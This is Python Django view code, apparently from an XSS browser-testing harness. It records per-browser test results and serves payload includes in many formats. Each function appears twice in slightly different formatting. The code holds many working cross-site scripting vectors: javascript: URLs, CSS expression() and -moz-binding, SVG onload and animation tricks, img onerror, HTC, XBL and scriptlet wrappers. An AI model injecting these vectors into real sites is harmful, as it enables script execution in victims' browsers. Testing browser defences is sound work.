def test(request, vector_id, context_id, encoding_id, verdict): b = Browser.objects.get(id=request.session["browser"]) v = Vector.objects.get(id=vector_id) wc = WebContext.objects.get(id=context_id) enc = Encoding.objects.get(id=encoding_id) if verdict == "pass": # todo: refactoring test object update t = Test.objects.filter(browser=b, vector=v, context=wc, encoding=enc) if t: t = t[0] t.result = "PASS" else: t = Test(browser=b, vector=v, context=wc, encoding=enc, result="PASS") t.save() return HttpResponseRedirect("/test/next") elif verdict == "xhrpass": # todo: refactoring test object update t = Test.objects.filter(browser=b, vector=v, context=wc, encoding=enc) if t: t = t[0] t.result = "PASS" else: t = Test(browser=b, vector=v, context=wc, encoding=enc, result="PASS") t.save() return HttpResponse("test n°" + str(vector_id) + " passed via xhttprequest") elif verdict == "imgpass": t = Test.objects.filter(browser=b, vector=v, context=wc, encoding=enc) if t: t = t[0] t.result = "PASS" else: t = Test(browser=b, vector=v, context=wc, encoding=enc, result="PASS") t.save() # TODO: Fix this f*****g path deployment issue !!! image_data = open("static/img/pass.png", "rb").read() return HttpResponse(image_data, mimetype="image/png") else: # todo: refactoring test object update baseurl = request.build_absolute_uri("/") domain = Site.objects.get_current() xss_instance = build_vector( v, test_payload(vector_id, context_id, encoding_id, baseurl, domain), "test", context_id, encoding_id, baseurl, ) t = Test.objects.filter(browser=b, vector=v, context=wc, encoding=enc) if t: t = t[0] t.result = "SENT" else: t = Test(browser=b, vector=v, context=wc, encoding=enc, result="SENT") t.save() # source=str(wc.source).replace("%(xss)s",xss_instance) source = wc.source % {"xss": xss_instance} resp = HttpResponse(source.decode("string_escape"), content_type=wc.mimetype + "; " + enc.web_encoding) return resp
def test(request, vector_id, context_id, encoding_id, verdict): b = Browser.objects.get(id=request.session['browser']) v = Vector.objects.get(id=vector_id) wc = WebContext.objects.get(id=context_id) enc = Encoding.objects.get(id=encoding_id) if verdict == "pass": #todo: refactoring test object update t = Test.objects.filter(browser=b, vector=v, context=wc, encoding=enc) if t: t = t[0] t.result = "PASS" else: t = Test(browser=b, vector=v, context=wc, encoding=enc, result="PASS") t.save() return HttpResponseRedirect("/test/next") elif verdict == "xhrpass": #todo: refactoring test object update t = Test.objects.filter(browser=b, vector=v, context=wc, encoding=enc) if t: t = t[0] t.result = "PASS" else: t = Test(browser=b, vector=v, context=wc, encoding=enc, result="PASS") t.save() return HttpResponse("test n°" + str(vector_id) + " passed via xhttprequest") elif verdict == "imgpass": t = Test.objects.filter(browser=b, vector=v, context=wc, encoding=enc) if t: t = t[0] t.result = "PASS" else: t = Test(browser=b, vector=v, context=wc, encoding=enc, result="PASS") t.save() #TODO: Fix this f*****g path deployment issue !!! image_data = open("static/img/pass.png", "rb").read() return HttpResponse(image_data, mimetype="image/png") else: #todo: refactoring test object update baseurl = request.build_absolute_uri("/") domain = Site.objects.get_current() xss_instance = build_vector( v, test_payload(vector_id, context_id, encoding_id, baseurl, domain), "test", context_id, encoding_id, baseurl) t = Test.objects.filter(browser=b, vector=v, context=wc, encoding=enc) if t: t = t[0] t.result = "SENT" else: t = Test(browser=b, vector=v, context=wc, encoding=enc, result="SENT") t.save() #source=str(wc.source).replace("%(xss)s",xss_instance) source = wc.source % {"xss": xss_instance} resp = HttpResponse(source.decode('string_escape'), content_type=wc.mimetype + "; " + enc.web_encoding) return resp
def inc(request, context, vector_id, context_id, encoding_id, type): #return a given payload as an include like .js or .css etc... response = HttpResponse() if context == "xss": source = xss_payload() elif context == "test": baseurl = request.build_absolute_uri("/") domain = Site.objects.get_current() source = test_payload(vector_id, context_id, encoding_id, baseurl, domain) else: return HttpResponse("WTF BBQ?") if type == "css": css = """ background-image: url('javascript:%(eval_p)s;'); background-image: expression(%(eval_p)s); -moz-binding:url("%(xssmoz)s"); }{-o-link:'javascript:%(eval_p)s';-o-link-source: current;}""" eval_p = eval_payload(source) response['Content-type'] = 'text/css' response.write(css % {'eval_p': eval_p, 'xssmoz': ''}) return response elif type == "js": response['Content-type'] = 'application/javascript' response.write(source) return response elif type == "jpg": response['Content-type'] = 'image/jpeg' response.write(source) return response elif type == "htc": eval_p = eval_payload(source) htc = """ <?xml version="1.0"?> <x> <payload><![CDATA[<img src=x onerror=%(eval_p)s>]]></payload> </x> <PUBLIC:COMPONENT TAGNAME="xss"> <PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/> </PUBLIC:COMPONENT> <SCRIPT> function main() { """ + source + """; } </SCRIPT>""" response['Content-type'] = 'text/plain' response.write(htc % { 'eval_p': eval_p, }) return response elif type == "html": return render_to_response('payload.html', { 'source': source, }) elif type == "xbl": eval_p = eval_payload(source) xbl = """ <?xml version="1.0" ?><bindings xmlns="http://www.mozilla.org/xbl"><binding id="xss"><implementation><constructor><![CDATA[%(eval_p)s]]></constructor></implementation></binding></bindings>""" return HttpResponse(xbl % { 'eval_p': eval_p, }) elif type == "svg": eval_p = eval_payload(source) svg = """ <form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:%(eval_p)s"><input value="XXX" type="submit"/></form> """ response['Content-type'] = 'image/svg+xml' response.write(svg % { 'eval_p': eval_p, }) return response elif type == "svg2": svg = """<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="%(eval_p)s" xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg>""" response['Content-type'] = 'image/svg+xml' eval_p = eval_payload(source) response.write(svg % { 'eval_p': eval_p, }) return response elif type == "svg3": svg = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <clipPath id="a" > <set xlink:href="#x" attributeName="xlink:href" begin="1s" to="javascript:%(eval_p)s" /> </clipPath> <pattern id="b"> <set xlink:href="#x" attributeName="xlink:href" begin="2s" to="javascript:%(eval_p)s" /> </pattern> <filter id="c"> <set xlink:href="#x" attributeName="xlink:href" begin="3s" to="javascript:%(eval_p)s" /> </filter> <marker id="d"> <set xlink:href="#x" attributeName="xlink:href" begin="4s" to="%(eval_p)s" /> </marker> <mask id="e"> <set xlink:href="#x" attributeName="xlink:href" begin="5s" to="javascript:%(eval_p)s" /> </mask> <linearGradient id="f"> <set xlink:href="#x" attributeName="xlink:href" begin="6s" to="javascript:%(eval_p)s" /> </linearGradient> </svg>""" response['Content-type'] = 'image/svg+xml' eval_p = eval_payload(source) response.write(svg % { 'eval_p': eval_p, }) return response elif type == "svg4": svg = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0"> <a xlink:href="http://google.com"> <set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" /> <rect width="1000" height="1000" fill="white"/> </a> </marker> </svg>""" response['Content-type'] = 'image/svg+xml' eval_p = eval_payload(source) response.write(svg % { 'eval_p': eval_p, }) return response elif type == "xxe": xxe = """<script xmlns="http://www.w3.org/1999/xhtml">%(eval_p)s</script>""" eval_p = eval_payload(source) return HttpResponse(xxe % { 'eval_p': eval_p, }) elif type == "dtd": dtd = """<!ENTITY x "<html:img src='x' xmlns:html='http://www.w3.org/1999/xhtml' onerror='%(eval_p)s'/>">""" eval_p = eval_payload(source) return HttpResponse(dtd % { 'eval_p': eval_p, }) elif type == "xdr": xdr = """<?xml version="1.0"?> <Schema name="x" xmlns="urn:schemas-microsoft-com:xml-data"> <ElementType name="img"> <AttributeType name="src" required="yes" default="x"/> <AttributeType name="onerror" required="yes" default="%(eval_p)s"/> <attribute type="src"/> <attribute type="onerror"/> </ElementType> </Schema>""" eval_p = eval_payload(source) return HttpResponse(xdr % { 'eval_p': eval_p, }) elif type == "evt": evt = """<script xmlns="http://www.w3.org/1999/xhtml" id="x">%(eval_p)s</script>""" eval_p = eval_payload(source) return HttpResponse(evt % { 'eval_p': eval_p, }) elif type == "vml": vml = """<xml> <rect style="height:100%;width:100%" id="xss" onmouseover="%(eval_p)s" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>""" eval_p = eval_payload(source) return HttpResponse(vml % { 'eval_p': eval_p, }) elif type == "sct": sct = """<SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS> <SCRIPT Language="javascript">%(eval_p)s</SCRIPT> </SCRIPTLET>""" eval_p = eval_payload(source) return HttpResponse(sct % { 'eval_p': eval_p, }) elif type == "php": event = """Event: load\ndata: \n\n""" eval_p = eval_payload(source) response['Content-type'] = 'application/x-dom-event-stream' response.write(event) return response else: return HttpResponse("fail !")
def inc(request, context, vector_id, context_id, encoding_id, type): # return a given payload as an include like .js or .css etc... response = HttpResponse() if context == "xss": source = xss_payload() elif context == "test": baseurl = request.build_absolute_uri("/") domain = Site.objects.get_current() source = test_payload(vector_id, context_id, encoding_id, baseurl, domain) else: return HttpResponse("WTF BBQ?") if type == "css": css = """ background-image: url('javascript:%(eval_p)s;'); background-image: expression(%(eval_p)s); -moz-binding:url("%(xssmoz)s"); }{-o-link:'javascript:%(eval_p)s';-o-link-source: current;}""" eval_p = eval_payload(source) response["Content-type"] = "text/css" response.write(css % {"eval_p": eval_p, "xssmoz": ""}) return response elif type == "js": response["Content-type"] = "application/javascript" response.write(source) return response elif type == "jpg": response["Content-type"] = "image/jpeg" response.write(source) return response elif type == "htc": eval_p = eval_payload(source) htc = ( """ <?xml version="1.0"?> <x> <payload><![CDATA[<img src=x onerror=%(eval_p)s>]]></payload> </x> <PUBLIC:COMPONENT TAGNAME="xss"> <PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/> </PUBLIC:COMPONENT> <SCRIPT> function main() { """ + source + """; } </SCRIPT>""" ) response["Content-type"] = "text/plain" response.write(htc % {"eval_p": eval_p}) return response elif type == "html": return render_to_response("payload.html", {"source": source}) elif type == "xbl": eval_p = eval_payload(source) xbl = """ <?xml version="1.0" ?><bindings xmlns="http://www.mozilla.org/xbl"><binding id="xss"><implementation><constructor><![CDATA[%(eval_p)s]]></constructor></implementation></binding></bindings>""" return HttpResponse(xbl % {"eval_p": eval_p}) elif type == "svg": eval_p = eval_payload(source) svg = """ <form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:%(eval_p)s"><input value="XXX" type="submit"/></form> """ response["Content-type"] = "image/svg+xml" response.write(svg % {"eval_p": eval_p}) return response elif type == "svg2": svg = """<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="%(eval_p)s" xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg>""" response["Content-type"] = "image/svg+xml" eval_p = eval_payload(source) response.write(svg % {"eval_p": eval_p}) return response elif type == "svg3": svg = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <clipPath id="a" > <set xlink:href="#x" attributeName="xlink:href" begin="1s" to="javascript:%(eval_p)s" /> </clipPath> <pattern id="b"> <set xlink:href="#x" attributeName="xlink:href" begin="2s" to="javascript:%(eval_p)s" /> </pattern> <filter id="c"> <set xlink:href="#x" attributeName="xlink:href" begin="3s" to="javascript:%(eval_p)s" /> </filter> <marker id="d"> <set xlink:href="#x" attributeName="xlink:href" begin="4s" to="%(eval_p)s" /> </marker> <mask id="e"> <set xlink:href="#x" attributeName="xlink:href" begin="5s" to="javascript:%(eval_p)s" /> </mask> <linearGradient id="f"> <set xlink:href="#x" attributeName="xlink:href" begin="6s" to="javascript:%(eval_p)s" /> </linearGradient> </svg>""" response["Content-type"] = "image/svg+xml" eval_p = eval_payload(source) response.write(svg % {"eval_p": eval_p}) return response elif type == "svg4": svg = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0"> <a xlink:href="http://google.com"> <set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" /> <rect width="1000" height="1000" fill="white"/> </a> </marker> </svg>""" response["Content-type"] = "image/svg+xml" eval_p = eval_payload(source) response.write(svg % {"eval_p": eval_p}) return response elif type == "xxe": xxe = """<script xmlns="http://www.w3.org/1999/xhtml">%(eval_p)s</script>""" eval_p = eval_payload(source) return HttpResponse(xxe % {"eval_p": eval_p}) elif type == "dtd": dtd = """<!ENTITY x "<html:img src='x' xmlns:html='http://www.w3.org/1999/xhtml' onerror='%(eval_p)s'/>">""" eval_p = eval_payload(source) return HttpResponse(dtd % {"eval_p": eval_p}) elif type == "xdr": xdr = """<?xml version="1.0"?> <Schema name="x" xmlns="urn:schemas-microsoft-com:xml-data"> <ElementType name="img"> <AttributeType name="src" required="yes" default="x"/> <AttributeType name="onerror" required="yes" default="%(eval_p)s"/> <attribute type="src"/> <attribute type="onerror"/> </ElementType> </Schema>""" eval_p = eval_payload(source) return HttpResponse(xdr % {"eval_p": eval_p}) elif type == "evt": evt = """<script xmlns="http://www.w3.org/1999/xhtml" id="x">%(eval_p)s</script>""" eval_p = eval_payload(source) return HttpResponse(evt % {"eval_p": eval_p}) elif type == "vml": vml = """<xml> <rect style="height:100%;width:100%" id="xss" onmouseover="%(eval_p)s" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>""" eval_p = eval_payload(source) return HttpResponse(vml % {"eval_p": eval_p}) elif type == "sct": sct = """<SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS> <SCRIPT Language="javascript">%(eval_p)s</SCRIPT> </SCRIPTLET>""" eval_p = eval_payload(source) return HttpResponse(sct % {"eval_p": eval_p}) elif type == "php": event = """Event: load\ndata: \n\n""" eval_p = eval_payload(source) response["Content-type"] = "application/x-dom-event-stream" response.write(event) return response else: return HttpResponse("fail !")